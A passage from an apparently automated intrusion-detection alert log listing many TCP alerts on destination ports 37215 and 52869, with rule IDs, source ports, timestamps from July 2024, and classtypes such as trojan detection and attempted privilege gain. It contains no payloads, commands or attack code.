                      Source Port:46228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2835222
                      Source Port:53992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:28.980707
                      SID:2025132
                      Source Port:59688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2829579
                      Source Port:48596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.134564
                      SID:2835222
                      Source Port:49052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.601619
                      SID:2025132
                      Source Port:45872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.403626
                      SID:2027339
                      Source Port:43818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.802194
                      SID:2027339
                      Source Port:42210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.040673
                      SID:2027339
                      Source Port:42252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.461008
                      SID:2025132
                      Source Port:56390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.124334
                      SID:2831300
                      Source Port:47884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.693281
                      SID:2829579
                      Source Port:48024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.232547
                      SID:2027339
                      Source Port:60446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2829579
                      Source Port:59668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:50598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.956352
                      SID:2027339
                      Source Port:33152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.463555
                      SID:2025132
                      Source Port:58530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2025132
                      Source Port:34886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:59170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2831300
                      Source Port:46926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.890086
                      SID:2027339
                      Source Port:49056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.159646
                      SID:2027339
                      Source Port:33116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.475871
                      SID:2025132
                      Source Port:59478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.173875
                      SID:2831300
                      Source Port:38444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.319175
                      SID:2027339
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.649917
                      SID:2025132
                      Source Port:51110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2829579
                      Source Port:51872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.736310
                      SID:2027339
                      Source Port:49474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.939710
                      SID:2027339
                      Source Port:48304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.903875
                      SID:2025132
                      Source Port:41496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.925500
                      SID:2025132
                      Source Port:39458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.801044
                      SID:2027339
                      Source Port:35014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2025132
                      Source Port:57986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.106820
                      SID:2835222
                      Source Port:53504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544972
                      SID:2027339
                      Source Port:60222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:58962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.266004
                      SID:2025132
                      Source Port:60988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.818180
                      SID:2027339
                      Source Port:47794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2027339
                      Source Port:50828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.994885
                      SID:2835222
                      Source Port:57982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2027339
                      Source Port:37764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.001261
                      SID:2025132
                      Source Port:33144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2831300
                      Source Port:56232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2027339
                      Source Port:56508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.771763
                      SID:2025132
                      Source Port:54230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.460027
                      SID:2025132
                      Source Port:57102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.023606
                      SID:2027339
                      Source Port:52700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2027339
                      Source Port:58126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.676146
                      SID:2025132
                      Source Port:55746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.741704
                      SID:2025132
                      Source Port:50472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.184596
                      SID:2027339
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:36590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.565160
                      SID:2027339
                      Source Port:48292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2831300
                      Source Port:45828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.860422
                      SID:2025132
                      Source Port:50342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:35500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.309937
                      SID:2027339
                      Source Port:41200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2835222
                      Source Port:48016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.552004
                      SID:2027339
                      Source Port:47228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.435855
                      SID:2027339
                      Source Port:60652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2025132
                      Source Port:59982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.755429
                      SID:2027339
                      Source Port:47304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2835222
                      Source Port:47036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2835222
                      Source Port:60348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2027339
                      Source Port:35348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.227636
                      SID:2027339
                      Source Port:58748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2835222
                      Source Port:48880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.733520
                      SID:2025132
                      Source Port:39418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:54822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:53516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2835222
                      Source Port:41108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2027339
                      Source Port:37914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.713951
                      SID:2025132
                      Source Port:41892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2027339
                      Source Port:42892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.242242
                      SID:2831300
                      Source Port:47824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2027339
                      Source Port:43942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.867091
                      SID:2025132
                      Source Port:46972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:39978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:58974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.817171
                      SID:2025132
                      Source Port:33822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.744805
                      SID:2025132
                      Source Port:52332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2829579
                      Source Port:53318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.631607
                      SID:2027339
                      Source Port:37614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2831300
                      Source Port:52538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.460913
                      SID:2027339
                      Source Port:55850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164213
                      SID:2027339
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:38616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:26.037863
                      SID:2027339
                      Source Port:41838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:55.239442
                      SID:2025132
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2831300
                      Source Port:36960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:45.997240
                      SID:2027339
                      Source Port:36896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2829579
                      Source Port:56722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.614585
                      SID:2025132
                      Source Port:39928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.437928
                      SID:2027339
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:44970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.510827
                      SID:2835222
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.534811
                      SID:2835222
                      Source Port:45060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.913916
                      SID:2831300
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2027339
                      Source Port:49236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.066315
                      SID:2027339
                      Source Port:52026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.718240
                      SID:2025132
                      Source Port:40108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.496981
                      SID:2025132
                      Source Port:53840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:55.227510
                      SID:2027339
                      Source Port:52000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.820676
                      SID:2025132
                      Source Port:58866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.260697
                      SID:2025132
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.773602
                      SID:2831300
                      Source Port:57862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.361407
                      SID:2025132
                      Source Port:38350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.876678
                      SID:2027339
                      Source Port:36204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2025132
                      Source Port:35346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2027339
                      Source Port:60024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2025132
                      Source Port:49810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2831300
                      Source Port:47716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2027339
                      Source Port:58328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2025132
                      Source Port:58258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.663932
                      SID:2025132
                      Source Port:60416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.852858
                      SID:2829579
                      Source Port:54158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.005292
                      SID:2027339
                      Source Port:53238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.470289
                      SID:2027339
                      Source Port:42678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:44418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2831300
                      Source Port:41992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.963945
                      SID:2831300
                      Source Port:42862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2027339
                      Source Port:41988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2027339
                      Source Port:57698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.700908
                      SID:2027339
                      Source Port:34802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:43574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.640556
                      SID:2027339
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622609
                      SID:2829579
                      Source Port:56302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.547041
                      SID:2027339
                      Source Port:54378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.301636
                      SID:2027339
                      Source Port:53752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.577316
                      SID:2835222
                      Source Port:57132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:41324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.822853
                      SID:2025132
                      Source Port:42418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:39228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2831300
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2831300
                      Source Port:39158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:52392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.849532
                      SID:2027339
                      Source Port:51742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2025132
                      Source Port:36028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.328787
                      SID:2027339
                      Source Port:55822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.591367
                      SID:2027339
                      Source Port:46050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.534267
                      SID:2027339
                      Source Port:38254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.126981
                      SID:2027339
                      Source Port:57506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2831300
                      Source Port:53122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:49438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.485916
                      SID:2027339
                      Source Port:38944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.221707
                      SID:2831300
                      Source Port:51298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2831300
                      Source Port:35782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.210083
                      SID:2025132
                      Source Port:46444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2027339
                      Source Port:33334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2027339
                      Source Port:39158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2829579
                      Source Port:53018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2027339
                      Source Port:57792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:52.775382
                      SID:2027339
                      Source Port:49872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.482595
                      SID:2027339
                      Source Port:36966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.603798
                      SID:2831300
                      Source Port:42498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.547041
                      SID:2831300
                      Source Port:54378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.589736
                      SID:2027339
                      Source Port:55764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2027339
                      Source Port:38582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.606013
                      SID:2027339
                      Source Port:40144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.595669
                      SID:2027339
                      Source Port:47900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.960598
                      SID:2027339
                      Source Port:44946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2831300
                      Source Port:34612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.905406
                      SID:2025132
                      Source Port:54116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454500
                      SID:2027339
                      Source Port:44784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2835222
                      Source Port:57000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2831300
                      Source Port:52064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.432404
                      SID:2831300
                      Source Port:40706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.692046
                      SID:2027339
                      Source Port:37414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.427717
                      SID:2027339
                      Source Port:40836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.342828
                      SID:2027339
                      Source Port:45828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.536716
                      SID:2027339
                      Source Port:39068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:42106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.862885
                      SID:2025132
                      Source Port:51598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.853073
                      SID:2025132
                      Source Port:43288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2027339
                      Source Port:55524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2829579
                      Source Port:46510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:44378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.391346
                      SID:2025132
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.361832
                      SID:2025132
                      Source Port:57610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.483612
                      SID:2831300
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.485669
                      SID:2027339
                      Source Port:50860
                      Destination Port:52869
